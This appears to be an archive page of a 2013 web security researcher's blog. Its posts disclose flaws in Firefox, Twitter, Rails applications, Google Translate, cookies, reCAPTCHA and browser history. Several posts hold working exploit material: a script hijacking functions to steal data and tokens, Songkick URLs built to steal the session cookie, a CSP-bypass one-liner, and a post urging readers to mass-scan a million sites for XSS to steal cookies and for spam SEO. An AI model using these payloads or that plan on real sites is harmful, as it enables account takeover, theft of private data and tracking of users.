Monday, December 23, 2013

Regexp Groups "Overflow" in Firefox

TL;DR: In Firefox regexps with 999 998+ groups  return false, no matter was the given string valid or not. It seems like a performance optimization, but theoretically can lead to security issues. I believe it should raise an exception instead of fooling the code.

Unrelated prehistory: Few weeks ago I was trying to XSS m.facebook.com location.hash validation with a timing attack.
(/^#~?!(?:\/?[\w\.-])+\/?(?:\?|$)/).test(location.hash)&&location.replace(...
I was trying to craft *long enough* regexp argument so I could get a spare second to replace the location.hash just before location.replace happens.
I'm no browser expert and don't comprehend how it works on low level - it didn't work out anyway, because it is single-threaded (with setTimeout timing attack works fine - try to XSS this page.)

The side-research is more interesting!

pic unrelated.

When I was testing FF i did notice, for huge payloads JS simply returns "false". For "/a/a..N times" it still was true but for N+1 times all of a sudden - false
Yeah, JS was like saying "TL;DR, hopefully it's false".

Wait, what?! Regexp can't just return a wrong result only because of the argument's length! Let's double check:

In Chrome

z=Array(999999).join('a');
console.log(/^([\w])+$/.test(z),z.length);
//true 999998

z=Array(999999+1).join('a');
console.log(/^([\w])+$/.test(z),z.length);
//true 999999


In FF

z=Array(999999).join('a');
console.log(/^([\w])+$/.test(z),z.length);
//true 999998

z=Array(999999+1).join('a');
console.log(/^([\w])+$/.test(z),z.length);
//false 999999

Apparently, thing is, after catching 999 998 regexp ([\w]) groups FF "gets tired" and returns false instead of finishing the work or raising an exception like Chrome does (RangeError: Maximum call stack size exceeded).

To turn it into an exploitable vulnerability you would need a JS regexp leading to something bad in "false" case - totally unlikely. But good place to start FF regexp "quirks" investigation.

P.S. Please fix me if I did not correctly understand the issue.

Saturday, December 14, 2013

How to send DM on Twitter w/o permission

I just recalled "SMS commands" feature and tried to send a DM (private, direct message) with "Share on Twitter"-button. It works!

But you know what's really cool? ANY app can send a DM on behalf of your account, by sending to API "d NAME TEXT". I just tested with Twitpic, as you can see it doesn't require any DM permissions.


Another guy claims he reported it before and twitter refused to fix.

Why is it a bug?
1) App is supposed to have Read & Write permission to access DMs. With this shortcut you can bypass that protection
2) DMs are easier to use for spam. User will barely notice it.
3) Also DMs don't show if it was sent with official client or a 3rd party OAuth client. Which is great for phishing.

API docs:
[no permission] https://dev.twitter.com/docs/api/1.1/post/direct_messages/new
[warns about permission] https://dev.twitter.com/docs/api/1.1/get/direct_messages/show

Friday, November 29, 2013

RJS leaking vulnerability in multiple Rails applications.

I wrote about this problem in May, without showcases, just a theoretical post http://homakov.blogspot.com/2013/05/do-not-use-rjs-like-techniques.html

It didn't help. Now I want people to take the issue seriously. This is a huge unsolved problem.

Developers have a tool which they don't know how to properly use. So they use it how they feel convenient. It leads to security breach. Reminds mass-assignment bug (sorry, i have to mention it every day to feel important)

How it works?
Attacker redefines RJS function(s), asks authorized user to visit specially crafted page and leaks data (which the user has access to) and his authenticity_token. Very similar to how JSONP works.
<script>
  var bcx = {progress: {}};
  var $ = function() {
    return {prepend: function(data) {
      window.data = data
    }}
  };
</script>
<script src="https://basecamp.com/2474985/progress.js"></script>

If it has any HTML form in it (especially when people use render_to_string), it also has user's authenticity_token automatically.
So RJS leaks 1) authenticity_token 2) a lot of private data. Thus the bug is as serious as XSS (can read responses + can craft proper requests). = must be fixed?





Some people are +1, some found it "useful in our projects" (=vulnerable), also DHH is against my proposal:
Not only are js.erb templates not deprecated, they are a great way to develop an application with Ajax responses where you can reuse your server-side templates. It's fine to explore ways to make this more secure by default, but the fundamental development style of returning JS as a response is both architecturally sound and an integral part of Rails. So that's not going anywhere.
What's left to do? Demonstrate with full disclosure: Gitlab, Redmine, Diaspora, Spree, Basecamp etc.






And this is only a tiny part of vulnerable apps we have out there. Let's choose our next actions wisely:
  1. find a way to deny cross-site inclusion of JS templates, not breaking whole technique
  2. remove whole :js responder as an insecure technique
  3. don't not do anything about it
Documentation is not an option. I wrote my RJS blog post in May, after half a year nobody still cares.

Is my app vulnerable?
If there are any .js.erb file under /app/views, most likely it is. Author of this article can perform a security audit for you, to make sure.

Saturday, November 9, 2013

Use 404 or Lazy Tips to finding XSS

In my opinion usefulness of an XSS on a random website is next to nothing. What are you going to do with XSS on your local school website? Stil da kookies?
So either you should look for XSS on a major website or find tons of random XSSes in hope some of them will turn out to be any useful.


https://gist.github.com/homakov/7384127

What is a Lazy technique? Only one GET request is required to check if there's XSS. Here are lazy techniques i have in mind:
  1. Developers don't spend much time on 404 pages. So there's >0% chance 404 page reflects unescaped input. The script above does simply GETs sitename.com/<img src=yolo onerror=alert(0)> and checks if the response body has the payload. Easy right?
  2. There are also 5xx errors, try playing with HPP (x[]=1&x[hash]=1) 
  3. Don't forget about 414 error (send super long payload). 
  4. site.com/#<img src=x> for $(location.hash) might work too but you need to catch alert execution in runtime.
  5. please share other lazy tricks you know! 

So I took the first 1k of Alexa and apparently 10+ are vulnerable (wikia, rottentomatoes etc). The script is not perfect (if status code is 404 it doesn't check the body) — feel free to improve it. For 1kk output might be 10k+ of vulnerable websites having PR more than 1. PROFITZ.

Here you can take Alexa top 1 000 000 in CSV

And make some money. For (black) SEO purposes you can make the google bot visit popular-website.com/<a href=//yoursite.com>GOOD</a> etc.
Also send some cheap human traffic on the XSSed pages and dump the page (with tokens in it) +  document.cookie to analyse / data mine it, hoping to find something useful.

So the recipe is simple: take that 1 million, create a lazy XSS pattern (consider more comprehensive patterns, ?redirect_to=..) then use the XSSed page for SEO / stealing cookies.

Completely hassle free way to find bugs. Oh, also check out the Sakurity Hustlers - Bug Hunters Top.

Wednesday, November 6, 2013

Stealing user session with open-redirect bug in Rails

Is open redirect bad for your website?
If we don't take into account "phishing", how can be open redirect dangerous? 
Mind reading http://homakov.blogspot.com/2013/03/redirecturi-is-achilles-heel-of-oauth.html because any redirect to 3rd party website will leak facebook access_tokens of your users. 
So innocent open redirect on logout will simply reveal access_token of current user when we set redirect_uri to Client/logout?to=3rdparty
That's really bad. Users won't be happy to see your client posting spam on behalf of their accounts. 

What about open redirect in Rails?
As I previously mentioned in my blog posts, Rails loves playing with arguments. You can send :back, or "location" or :location => "location" or ->{some proc} or :protocol=>"https", :host=>"google.com" etc. So because of this line
redirect_to params[:to]
attacker has multiple ways to compromise the redirect.

1. params[:to][0] == '/' is not good protection, since //google.com is a legit URL. (By the way if you use regexp avoid $^, luke)
2. XSS by sending ?to[protocol]=javascript:payload()//&to[status]=200
3. Discovered yesterday, we can see plain HTTP headers in response body by sending ?to[status]=1

Live demo on Songkick

Step 1, open with GET or POST params
https://www.songkick.com/session/new?success_url[protocol]=javascript&success_url[host]=%250Alocation=name//&success_url[status]=200

Step 2, user clicks on the XSS link and executes payload from window name

Step 3, payload parses broken HTTP response and leaks httpOnly session cookie
https://www.songkick.com/session/new?success_url[status]=1

Frankly, this bug is really common. I found it in more than 5 popular rails startups though I only started checking.
If you need careful security audit (or brutal pentest) of your app, visit http://www.sakurity.com/

Saturday, July 27, 2013

Google Translate hack explained

I wrote an article today and it sucked.

Here on HN I was told a couple of times that:
1) PoC doesn't work
2) nothing is clear

Sorry, everyone. I really didn't notice that "Safe Mode" issue locally.
How can I fix this?
1) I crafted a groundbreaking awesome PoC using new technique, and it's working in Chrome and FF for logged in / logged out users like a charm.
2) I will explain how it works thoroughly.

Kremlin.ru announces Russia is Mango Federation!

Vulnerability
From time to time we need to translate news / articles from foreign trustworthy websites, official news feeds etc. Can we break into GT(Google Translate) system and modify output for a prank or something worse? Yes, because GT loads all untrusted "user content" using the GUC domain (googleusercontent.com). Thus GUC guc2.html can modify content of GUC kremlin, because of SOP (same origin policy).

But there were many interesting "pitfalls" i had to solve on my way to this awesome PoC:

  1. By default google has "Safe Mode" on GUC pages. sandbox=allow-scripts allow-forms allow-same-origin. This means GUC pages cannot open new windows. So i used "opener" trick: I opened guc2.html?i in a new window and replaced current one with GT kremlin. Now there is a bridge between GUC guc2.html and GUC kremlin via parent.parent.opener.frames[0]
  2. GUC guc2.html cannot close GT guc2.html because this action is also restricted by sandbox attribute. This is why I framed GT guc2.html under guc2.html?i (I really don't know why GT doesn't have X-Frame-Options. This helped me a lot)
  3. I need at least one click to open guc2.html?i. Otherwise popup will be blocked. When you hover on the link above you see the innocent google translate path. In background, the onclick event will produce one more window ( guc2.html?i ).
  4. guc2.html?i creates an iframe (opacity=0!) with GT guc2.html, and waits for "onmessage" event to close itself.
  5. As soon as GUC guc2.html is loaded it starts a setInterval trying to modify GUC kremlin using this elegant chain: parent.parent.opener.frames[0]. When modifications are done it invokes parent.parent.postMessage('close','*') to let guc2.html?i know that business is done.
  6. Second window is closed in 1-2 seconds, first window has GT kremlin with modified content. Enjoy reading Mango news.
Please, dig this JS and ask questions. My duty is to answer them all.

Sunday, July 21, 2013

Core flaw of Cookies.

It's ignorance of Origin.

I've been ranting about cookies before, but now realized the very general flaw of cookies: they ignore Origins.
Origin = Protocol (the way you talk to server, e.g. http/https) + Domain (server name) + Port. It looks like http://example.org:3000 or https://www.example.org

Obviously, cookies is the only adequate way to authenticate users.
Why localStorage is not for authentication? it's accessible on client side thus authentication data can be leaked + it's not sent on server side automatically, you need to manually pass it with a header/parameter.

Origins made web interactions secure and concise:
localStorage from http://example.com can't be read on http://example.com:3000
DOM data of http://example.com can't be accessed on http://example.com:3000
XMLHttpRequest cannot load http://lh.com:4567/. Origin http://lh.com:3000 is not allowed by Access-Control-Allow-Origin
and so on.. But here comes cookies design!

Cookies got 99 problems, and XSS is one.
1) In fact "most of the time most of the people" don't need access to cookies from client side. Flag 'httpOnly;' was created to restrict javascript access to a cookie value (such a confusing name, isn't it? Only for http: or what). Also, who actually needed the 'path=' option ever? One more layer of confusion.

2) "protocol" and Cookie Forcing problem.
People were aware of MITM and they restricted sending "https" cookies to "http" - great!
They didn't restrict sending "http" cookies to "https" - oh shi~. Cookie forcing leads to cookie tossing easily and cookie tossing leads to user owning pretty easily as well.

Tip: Store csrf_token inside of the session cookie (literally) and refresh it after login.

3) The "port" thing.
This is not a solved problem yet. If someone owned a ToDo-App at https://site.com:4567 he will get all the cookies for https://site.com with every request. Yes, "httpOnly;". Yes, "Secure;" too. Cookies just don't care about ports.

How can we fix cookies?
1) Don't let Ports share cookies - make browsers "think" that port is a part of a domain name.
2) Origin field. Set-Cookie: sid=123qwe; Origin=https://site.com:4567/; will mean "Secure;", "Port=4567" and "Domain=site.com" at the same time.

Conclusion.
During last decade many workarounds were introduced only to make cookies more sane, yet not implementing straightforward Origin approach. We are doomed to maintain it forever...?

Tip: don't run unreliable apps using a different port because cookies will ignore it. Check your localhost, developer!

Thursday, July 4, 2013

XSS Defense in Depth (with Rack/Rails demo)

Quick introduction to the XSS problem
XSS is not only about scripts. Overall it happens when attacker can break the expected DOM structure with new attributes/nodes. For example <a data-remote=true data-method=delete href=/delete_account>CLICK</a> is a script-less XSS (in Rails jquery_ujs will turn the click into DELETE request).
It can happen either on page load (normal XSS) or in run time (DOM XSS). When payload was successfully injected there is no safe place from it on the whole origin. Any CSRF token is readable, any page content is accessible on site.com/*.

XSS is often found on static pages, in *.swf files, *.pdf Adobe bugs and so on. It happens, and there is no guaranty you won't have it ever.

You can reduce the damage
Assuming there is GET+POST /update_password endpoint, wouldn't it look like a good idea to deny all requests to POST /update_password from pages different from GET /update_password?

Awesome! But no, Pagebox is a technique for the next generation of websites because of many browser problems.

Thankfully similar technique can be implemented with subdomains:
www.site.com (all common functions, static pages)
login.site.com (it must be a different subdomain, because XSS can steal passwords)
settings.site.com
creditcards.site.com
etc

App serves specific (secure) routes only from dedicated domain zones, which have different CSRF tokens. All subdomains share same session and run same application, upgrade is really seamless, user will not notice anything, redirects are automatic.

How to add it to a Rack/Rails app

You only need to modify config.ru (I monkeypatched rails method, it's easy to do same for a sinatra app)

It fails if you GET/POST www.site.com/secure_page from www page because middleware redirects to secure.site.com (which has different origin - you cannot read the response)
It fails if you POST to secure.site.com/secure_page with www page CSRF token because secure subdomain uses different CSRF token which www doesn't know.
Neat!

The demo is a basic prototype and may content bugs, here you can download the code.

There is also a subdomainbox gem. I hope to see more Domain Box gems for ruby apps along with libraries for PHP/Python apps. Maybe we should add this in Rails core, telling other programmers who cares about security the most?

[PUNCHLINE] Is it you? We're looking forward to hearing from you. Sakurity provides penetration tests, source code audit and vulnerability assessment.

Thursday, June 20, 2013

Cookie Forcing protection made easy

I wrote a post about CSRF tool and readers noticed an intentional mistake in it — storing a token in a plain cookie can be exploited with cookie forcing (like cookie tossing we saw on github, but works everywhere). TL;DR With MITM attackers can replace or expire any cookie (write-only)

Actually I don't think it's mistake in CSRF protection design, I still think problem is about horrible cookies design. But we got to deal with current situation, and taking into account this feature I came up to concise and effective protection.

At first glance it might look ugly. But web is ugly so it's OK.

Step 1. We simply put csrf_token value into session. Wait, we do not store it in database, because it's pointless. We do not store it in signed cookie either like Rails do (this is also overwork).
I propose to literally store csrf_token in session cookie:
sid=123qweMySeSsIon--321csRFtoKeN
You only need a middleware on top of the stack slicing the token after --.

Step 2. Attacker still can fixate the whole session cookie value (sid + csrf token). So always refresh csrf_token after login to make sure csrf_token wasn't fixated.

Can you see anything simpler than this trick? I guess everything using two separate cookies will require signatures and cryptography with server secret. Too much work for a design mistake W3C made.

Although CSRF protection on its own is not popular, cookie forcing protection is way less popular — don't be surprised how many websites/frameworks are vulnerable. How to check: it is vulnerable if you can replace csrf_token cookie (use Edit This Cookie) not breaking session or csrf_token remains same after login.

For example Django framework (csrftoken cookie is not integrated with session), twitter (doesn't refresh authenticity_token after log in, so it can be fixated), etc.

Google Reader is dead, make sure to follow me on another website.

Thursday, June 13, 2013

Camjacking: Click and say Cheese

on reddit/HN
This post in based on an interesting trick by @typicalrabbit.

UPD: This has been known since 2011, but not fixed yet. Why?! I made a PoC to demonstrate the severity.

TL;DR this works precisely like regular clickjacking - you click on a transparent flash object, it allows access to Camera/Audio channel. Voila, attacker sees and hears you.

This is not a stable exploit (tested on Mac and Chrome. I do use Mac and Chrome so this is a big deal anyway).

Your photo can be saved on our servers but we don't do this in the PoC. (Well, we had an idea to charge $1 for deleting a photo but it would not be fun for you). Donations are welcome though.

Proof of Concept (not safe for work a bit)

Wait a minute! Hire us for security stuff.

Sunday, May 19, 2013

The reCAPTCHA Problem

TL;DR Nope, I didn't find a major breach, just an interesting detail in reCAPTCHA's design.

CAPTCHA ain't no good for CSRF
I was told on twitter that CAPTCHA mitigates CSRF (And, wow, it is "officially" on OWASP Challenge-Response section). Here is my opinion — it does not, it will not, it should not. Feel free to wipe out that section from the document.

CAPTCHA in a nutshell
http://en.wikipedia.org/wiki/CAPTCHA
"challenge" is literally a key to solution (not necessary random, solution can be encrypted inside - state less).
"response" is an attempt to recognize the given image.
Client is a website that hates automated actions, e.g. registrations.
Provider generates new challenges and verifies attempts.
User — a human being or a bot promoting viagra online no prescription las vegas. Nobody knows exactly until User solves the CAPTCHA.

Ideal flow
1. User comes to Client.
2. Client securely gets a new challenge from Provider.
3. Client sends back to User the challenge value with corresponding image.
4. User submits the form along with challenge and response. Client verifies them by sending over to Provider.
5. If Provider responds successfully — User is likely a pink human, otherwise:
if amount_of_attempts > 3
  BAN FOR A WHILE
else
  GOTO 2
end

As you can see User talks directly to Client. He has no idea about Provider.
Only 1 challenge per form attempt is allowed. 3 fails in a row = BAN. Does not matter how hard challenges are, User must try to solve them.


reCAPTCHA is easy to install, free, secure and very popular.


The reCAPTCHA flow
1. Client obtains public key and private key at https://developers.google.com/recaptcha/intro
2. Client adds some JS containing his public key to the HTML form.
3. User opens the page, User's browser makes a request to Provider and gets a new challenge.
4. User solves it and sends challenge with response to Client
5. Client verifies it by calling Provider's API (CSRF Tool template). In case of failed attempt User is required to reload the Provider's iframe to get a new challenge - GOTO 3.

The reCAPTCHA problem
Client knows how many wrong attempt you made (because verification is server side) but doesn't know how many challenges you actually received (because User gets challenge with JS, Client isn't involved). Getting a challenge and verifying a challenge are loosely coupled events.

Let's assume I have a script which recognizes 1 of 1000 reCAPTCHA images. That's quite a shitty script, right?

Wait, I have another script which loads  http://www.google.com/recaptcha/api/noscript?k=VICTIM_PUBLIC_KEY (demo link) and parses src="image?c=CHALLENGE_HERE"></center

For 100 000 images script solves (more or less reliably) 100 of them and crafts valid requests to Client by putting solved challenge/response pairs in them.

Analogy: User = Student, Client = Exam, Provider = Table with questions.
To pass it Student got to solve at least 1 problem, and he has only 3 attempts. In reCAPTCHA world Student goes to the table and looks over all questions on it, trying to find the easiest one.

You don't need to solve reCAPTCHAs as soon as you receive them anymore. You don't need to hit Client at all to get challenges. You talk directly to Provider, get some reCAPTCHAs with Client's PUBLIC_KEY, solve the easiest and have fun with different vectors.

There are blackhat APIs like antigate_com which are quite good at solving CAPTCHAs (private scripts and chinese kids, I guess).
With such trick they can create a special API for reCAPTCHA. You send victim's PUBLIC_KEY and get back N solved CAPTCHAs which you can use in malicious requests.

Mitigation
I cannot say if it should be fixed, but website owners must be aware that challenges are out of their control. To fix this reCAPTCHA could return amount of challenges and failed attempts with verification response.

Questions? I realized this an hour ago so I can possibly be mistaken somewhere, or I didn't discover it first. Point it out please.

Saturday, May 18, 2013

CSRF Tool

I facepalm when  I hear about CSRF in popular websites. (I was searching for them in the past but then realized that's a boring waste of time).

A while ago our friend Nir published CSRF changing Facebook password and it was the last straw. I can recall at least 5 major CSRF vulnerabilities in Facebook published in last 6 months. This level of web security is inacceptable nonsense for Facebook.

So, here is a short reminder about mitigation: 
Every state-changing (POST) request must contain a random token. Server-side must check it before processing the request using value stored in received cookies: cookies[:token] == params[:token]. If any POST endpoint lacks it — something is clearly wrong with implementation

For making world a better place I created simple and handy CSRF Tool: homakov.github.io


  1. Copy as Curl from Web Inspector, paste into text field and get a working template in a few clicks:
  2. No hassle. Researchers need a playground to demonstrate CSRF, with CSRF Tool you can simply give a link with working template. 
  3. No disclosure. Fragment (part after #) is not sent on server side, so I am not able to track CSRFs you currently research (Github Pages don't have server side anyway). Link to template contains all information inside.
  4. Auto-submit for more fun, Base64 makes URL longer but hides the template.
  5. Add new fields and modify existing ones, change request method and endpoint path seamlessly. 
  6. Post into iframe (which is carefully sandboxed) or a new window, try Referrer-free submission and so on.
You got a cross site request forgery tool
tell me whatcha gonna do???




Everything is free but donations are welcome :) PayPal: homakov@gmail.com

Tuesday, May 14, 2013

Two Factor Authentication? Try OAuth!


UPD: no wonder, I missed the fact that OAuth providers use static passwords and it cannot be legit 2nd factor, just makes 1st factor harder to exploit. Thanks for feedback people from reddit!


Disclaimer: I'm noob in Two Factor Authentication (TFA). I got an idea today which I want to share and get feedback, your comments are totally welcome.

I don't have a mobile phone. Not only because russian mobile providers are cheaters (likely, same in your country) but also for many other reasons: traveling (my mastercard was blocked once in Sofia and I needed SMS approval code, which I couldn't receive — my mobile was "outside the coverage area" all the time), no daily usage (never needed to call someone ASAP in real life. maybe I am such a nerd), VoIP FTW etc — who cares, this is not my point.



The thing is all physical items (mobile phone, yubikey, token generators, biometrics of eye, fingerprints) are clone-able / steal-able or just not reliable enough (face/gesture/speech recognition).

Again, in disclaimer I said I don't know if scientists already created a universal reliable physical object for TFA, I just read wiki article a bit and seems they did not.

Why must Second Factor provider be a real object in our digital century? Is it really any better/safer (clearly less convenient) than yet another password or bunch of cookies our browsers store? I doubt.

In browser we trust.

OAuth is not supposed to authenticate you, no surprise here. Although an OAuth (or OpenID) provider can be trusted 3rd party which will approve the action your are about to commit.

Trusted 3rd Party Website
  1. every normal Internet user has or can register Facebook/Twitter/Paypal/Google account immediately with no "physical" hassle attached.
  2. Attack surface is added, attack complexity increases dramatically.
    example.com surface + twitter surface + facebook surface = hacker needs XSS or similar bug in two major social networks and your example.com password to log in your example.com account.
    Not enough? Add Paypal Connect. Add force-login option so attacker will need all of your passwords.

    The more guys say John is a reliable person I can trust, the more I believe he really is. And I don't need to look at John's tattoo (a poor analogy for biometrics) which he hates to show!
  3. Hassle-free. Just be logged in FB/twitter all the time and couple of quick OAuth redirects in iframes (no interaction required at all) will make sure that your current FB account is the one attached to example.com account, your current twitter user is equal example.com attached one.
    It can be simplified and more secured because you only need /me endpoint data, actual access_token will not be used. 
Leaving the post short by purpose, waiting for your ideas, perhaps I missed something huge. Thanks!


Saturday, May 4, 2013

Do not use RJS-like techniques

RJS (Ruby JavaScript) — a straightforward technique when server side (e.g. Rails app) responds with Javascript code and client-side eval-s it (Writing JS in Ruby is unrelated, I only consider response-evaling concept!)

Here are my usability and security concerns about this interaction.

Possibly other developers use their own RJS-like techniques — they can find my post helpful too.
(c) from http://slash7.com/assets/2006/10/8/RJS-Demistified_Amy-Hoy-slash7_1.pdf
  1. Broken concept & architecture. This feels as weird as the client-side sending code that is going to be evaled on the server-side... wait... Rails programmers had similar thing for a while :/
    Any RCEJS technique can be painlessly split into client's listeners and server's data.
  2. Escaping user content and putting it into Javascript can be more painful and having more pitfalls then normal HTML escaping. Even :javascript section used to be vulnerable in HAML (</script> breaks .to_json in Rails < 4). There can be more special characters and XSS you should care about.
  3. JSONP-like data leaking. If app accepts GET request and responds with Javascript containing private data in it attacker can use fake JS functions to leak data from the response. For example response is:

    Page.updateData("data")

    and attacker crafts such page:

    <script>var Page={updateData:function(leak){ ... }}</script>
    <script src="http://TARGET/get_data.js?params"></script>

    Voila, joys of RJS
  4. UPD as pointed out on HN evaling response will mess with your global namespace and there is no way to jump into closure you created request in..
Original RJS (Ruby-generates-JS) was removed by Yahuda Katz 6 years ago, he gave me this link with more details.

But I still see in the wild apps responding with private data in javascript. This is a very fragile technique, refactoring will both improve code quality and secureness of your app.

P.S. Cool, GH uses cutting edge HTML 5 security and added CSP headers. My thoughts:

  • Rails 4 has built-in default_headers (guess who added it?), which has better performance than before filter
  • current CSP is easily bypassed with JSONP trick, just write in console on github.com:
    document.write('<script src="https://github.com/rails.json?callback=alert(0)//"></script>')
    i will fix it when get spare time, btw: https://github.com/rails/rails/pull/9075
  • CSP is very far from ultimate XSS prevention. Really very far, especially for Rails's agileness and jquery_ujs. Github should consider privileged subdomains https://github.com/populr/subdomainbox 

Saturday, April 20, 2013

How frames can mess with parent's namespace

This post describes pitfalls of cross-frame navigation. It started to "feel wrong" from the very beginning, and yesterday I noticed another quite interesting behaviour.

First of all, look closely at 'frames' property. Did you know that...


window == frames
true
self == frames
true
frames and window are the same variable — WindowProxy object. 
You probably know that any frame is accessible in parent via calling window.name:
<iframe name="some_frame" src=...> creates some_frame variable pointing to another WindowProxy object.

The tricky part is, frame can redefine its own window.name and it will inject a new variable in parent's namespace (if that variable is undefined — you cannot shadow existing variables...)

Let me remind you the "script killer" trick (we used to kill framebreakers with it). XSS Auditor by default removes pieces of scripts looking "malicious" (if you want to cut off <script src="/lib.js"></script> just pass this code in the query string)

Rough example:
1. page on (frameable) site.com has some innocent iframe (e.g. facebook like).
2. also it does some actions when JS variable 'approved' is true-ish:
<script>var approved = false</script>
after page load or click ...
<script>if(approved){actions!}else{alert('not approved yet');}
3. evil.com opens <iframe name="target" src="http://site.com/page?slice=%3Cscript%3Evar%20approved%20%3D%20false%3C%2Fscript%3E"> - this kills approved variable.
4. Now it navigates facebook button (because of Frame Navigation madness) target[0].location='http://evil.com/constructor' (target is WindowProxy - and [0] is its first frame - fb like)
5. constructor changes frame's window.name = 'approved'
6. now there is "approved" variable in namespace of site.com and if(approved) returns true - actions!

Also:
1. approved+'' returns "[object Window]" (didn't find a way to redefine toString). Would be much more dangerous if we could play with the stringified value
2. it can be any complex nested variable (/constructor will just build nested frames page with specific window.names). e.g. config.user.names[0] - we can replace this variable (creating iframe in "names" iframe under "user" iframe which is under "config" iframe)! With [object Window], but anyway ;)
3. you can use this playground from previous post

Such tricks are reminders how ridiculous web standards can be (URL disclosure is my favorite WontFix).


Friday, April 5, 2013

HTML5 Sandbox - a bad idea

About sandbox.

I don't like both idea and implementations of the Sandbox feature (part of so-called HTML5). Most of the articles about it are lame copy-pastes of the spec. Straight question WHY WE NEED IT AT ALL remains not answered. Furthermore, nobody writes that implementation is a little bit crazy — by fixing small vulnerabilities it introduces huge ones.

Why?

When we embed frames with external content we are still open for navigational and/or phishing attacks (obviously cookies/inner HTML cannot be stolen because of the same origin policy). The iframe code can change top.location or open a phishing popup window prompt('your password?'). ... that's it. That's all we needed to fix.

Besides allow-popup and allow-top-navigation options W3C introduced allow-scripts, allow-forms and allow-same-origin. They wanted best you know the rest.

Javascript... malicious shit.

OMG, sandbox can load any page with javascript turned off.

People are still fixing CSS for IE6. Meanwhile W3C destroys all Javascript-based framebreakers, not asking anyone's advice (only one anti-clickjacking solution left - X-Frame-Options). Nobody gave a shit about compatibility, I guess.

W3C needed a really good reason to introduce such a crazy feature: "Javascript from a frame can do malicious actions, now you can turn it off".
Malicious what? Tomorrow they will call Javascript a Remote Code Execution Vulnerability and ask us to remove the browser? Javascript cannot be malicious on it's own!

allow-forms + disallow scripts = clickjacking working like a charm for javascript-based framebreakers. Surely, not everyone uses X-Frame-Options yet, e.g. vk.com. UPDHere is a talk from BlackHat 11 last 2 years it is WontFix :O

Untrusted code on the same origin.

Another announced killer-feature of Sandbox - running untrusted code on your origin (remark: USE A SUBDOMAIN DONT BE STUPID). People tend to believe it: "Cool, I will set up a javascript playground on my website!". This?

<iframe src="SITE/playground?code=alert(1)" sandbox="allow-scripts"> 

Now think again, what stops an attacker to simply use 'SITE/playground?code=alert(1)' as an XSS hole?

Following may sound like a genius idea to prevent it - putting Sandbox into Content-Security-Policy header and let server-side to set sandbox directive. So far only Chrome supports such header (I use this technology in Pagebox - XSS protection through privilegies).

You cannot rely on it out-of-box, thus you need a way more comprehensive solution — you have to make sure that current page is loaded under sandbox (request is authentic), not in a new window

Server-side on th owner page: cookie[:nonce]=SecureRandom.hex(16).

HTML code: <iframe src="SITE/playground?code=alert(1)&nonce=123qwe123" sandbox="allow-scripts"> 

Playground server side: if params[:nonce] and cookie[:nonce] == params[:nonce] ..response..

Now you are secure from arbitrary code reflection. Anyway, don't use it. 

Sandbox was intended only to prevent top navigation (related frame navigation madness) and "phishing" popups. Severity of fixed = very low.

Eventually Sandbox simply broke the Web by creating a new clickjacking bypass. Severity of introduced = high.

Misleading posts make people think that Sandbox is a secure way to embed arbitrary content, but there are strings attached.

I don't mean Sandbox is all bad, I only state that current Sandbox is a poorly designed feature.

Wednesday, March 20, 2013

Pwning Your Privacy in All Browsers

I found new vectors and techniques for the detection attack from my previous post. There is a cross browser way to detect does certain URL redirect to another URL and is destination URL equal to TRY_URL. Interestingly in webkit you can check a few millions of TRY_URLs per minute (brute force).

There were similar attacks: CSS-visited-links leaking, cross domain search timing but the vector I am going to describe looks more universal and dangerous.

For sure this is not a critical vulnerability - 9 thousand years to brute force, say, /callback?code=j4JIos94nh (64**10 => 1152921504606846976 checking 25mln/min). Stealing random tokens does not seem feasible.

On the other hand the trick is WontFix. Every website owner can detect:
  1. if you are user of any other website - github, google, or, maybe, DirtyRussianGirls.com... ?
  2. if you have access to some private resources/URLs (do you follow some protected twitter account)
  3. applications you authorized on any OAuth1/2 provider
  4. some private bits URL can contain: your Facebook nickname or Vkontakte ID.



I wrote a simple JS function and playground - feel free to use! (Sorry playground can be buggy sometimes, timeouts for Firefox should be longer and direct_history=false)

check_redirect(base, callback, [assigner])

base, String - starting URL. Can redirect to other URL automatically or only with some conditions (user is not logged in).

callback, Function - receives one Boolean argument, true when at least one of assigned URLs changed history instantly (URL was guessed properly) and false when history object wasn't updated (no URL guessed and all assignment were "reloading").

assigner, Function - optional callback, can be used for arbitary URL attempts and iterations (bruteforce). For example bruteforcing user id between 0-99:
function(w){
  for(var i=0;i < 100;i++){
    w.location='http://site.com/user?id='+i+'#';
  }
}

By default exploit assigns location=base+'#', making sure no redirect happened at all. Checking if user is logged in on any website is super easy:

check_redirect('http://site.com/private_path',function(result){
  alert(result ? 'yes' : 'no');
}).
(/private_path path is supposed to redirect user, in case he is not logged in.

Under the hood.

When you execute cross_origin_window.location=SAME_URL# and SAME_URL is equal to current location, browsers do not reload that frame. But, at the same time, they update 'history' object instantly.
This opens a timing attack on history object:
  1. Prepare 2 slots in history POINT 1 and POINT 2 that belong to your origin.
    cross_origin_window.location="/postback.html#1"
    cross_origin_window.location="/postback.html#2"
  2. Navigate cross origin window to BASE_URL
    cross_origin_window.location=base_url;
  3. Try to assign location=TRY_URL# and instantly navigate 2 history slots back.
    cross_origin_window.location=try_url+'#';
    cross_origin_window.history.go(-2) 
  4. If the frame changed location to POINT 2 - your TRY_URL was equal to  REAL_URL and history object was updated instantly. If it is POINT 1 - TRY_URL was different and it made browser to start page reloading, history object was not changed immediately.
Wait, only Chrome supports cross origin access to "history" property - how can you make it work on other browsers?


Thankfully I found a universal bypass - simply assign a new location POINT 3 which will contain <script>history.go(-3)</script> doing the same job.



Bruteforce in webkit:

Vkontakte (russian social network) http://m.vk.com/photos redirects to http://m.vk.com/photosUSER_ID. We can use map-reduce-technique from my previous Chrome Auditor script extraction attack.
Iterate 1-1kk, 1kk-2kk, 2kk-3kk and see which one returned to POINT 2. Repeat: 2000000-2100000, 2100000-2200000 etc.

It will take a few minutes to brute force certain user id between 1 and 1 000 000. Vkontakte has more than 100 millions of users - around 10 minutes should be enough.

Maybe performance tricks can make bruteforce loop faster (e.g. web workers). So far for(){} loop is only bottle neck here :)

Conclusion

Website owners can track customers' hobbies, facebook friends (predefined) visiting their blogs etc.

I have a strong feeling we dont want such information to be disclosed. It should be fixed just like CSS :visited vulnerability was fixed a few years ago.

Please, browsers, change your mind :)

Bonus - 414 and XFO

During the research I found unrelated but interesting attack vector, based on X-Frame-Options detection (Jeremiah wrote about it) and 414 error (URI is too long).

Server error pages almost never serve X-Frame-Options header and this trick can be applied for many popular websites using X-Frame-Options.

The picture below makes it clear (LONG_PAYLOAD depends on the server configuration, usually 5000-50000 symbols.):


Friday, March 15, 2013

The Achilles Heel of OAuth or Why Facebook Adds #_=_

